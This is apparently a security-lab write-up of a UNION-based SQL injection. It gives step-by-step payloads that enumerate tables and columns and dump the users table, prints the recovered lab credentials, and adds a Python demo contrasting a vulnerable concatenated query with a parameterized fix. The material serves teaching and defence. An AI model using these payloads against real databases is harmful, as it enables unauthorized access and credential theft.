SQL injection attack, listing the database content

SQL injection attack, listing the database contents on non-Oracle databases

Solution

Get number of columns

' UNION SELECT NULL,NULL --

Get table_name from information_schema.tables

' UNION SELECT table_name,NULL FROM information_schema.tables--

We focus on users_gnfqea

Get column_name from information_schema.columns

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name = 'users_gnfqea'--

We find two interesting things:
username_ktawrd
password_hqmwuu

Get password for user administrator

' UNION SELECT username_ktawrd,password_hqmwuu FROM users_gnfqea--

I found 3 users and passwords:
wiener
stku88ba15mak5imsqv1

carlos
yl1grapzz4ah7h6oixum

administrator
q936iqlaivlfamjx6mnt

Login as user: administrator

administrator
q936iqlaivlfamjx6mnt
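
Why the payloads above reach the users table, and the fix that stops them, shown as an added example that is not part of the original write-up. It assumes a hypothetical category filter built by string concatenation and uses an in-memory SQLite database as a stand-in for the lab's engine; the products table, the function names and the stored password value are constructed.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab database (SQLite, not the lab's real engine).
    # Table and column names for the users table are the ones found in the write-up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        INSERT INTO products VALUES ('Mug', 'Ceramic mug', 'Gifts');
        CREATE TABLE users_gnfqea (username_ktawrd TEXT, password_hqmwuu TEXT);
        INSERT INTO users_gnfqea VALUES ('administrator', 'constructed-secret');
    """)
    return db


def search_vulnerable(db, category):
    # The input becomes part of the SQL text: a quote in it closes the string
    # literal and everything after it is parsed as SQL.
    sql = ("SELECT name, description FROM products WHERE category = '"
           + category + "'")
    return db.execute(sql).fetchall()


def search_parameterized(db, category):
    # The input is bound as a value and can never change the statement's
    # structure; the payload is just a category name that matches nothing.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()


# Payloads taken from the steps above.
COLUMN_PROBE = "' UNION SELECT NULL,NULL --"
DUMP_USERS = "' UNION SELECT username_ktawrd,password_hqmwuu FROM users_gnfqea--"

if __name__ == "__main__":
    db = make_db()
    for value in ("Gifts", COLUMN_PROBE, DUMP_USERS):
        print("input:        ", value)
        print("concatenated: ", search_vulnerable(db, value))
        print("parameterized:", search_parameterized(db, value))
```

With the bound parameter, both payloads return no rows, while the legitimate category still returns its product.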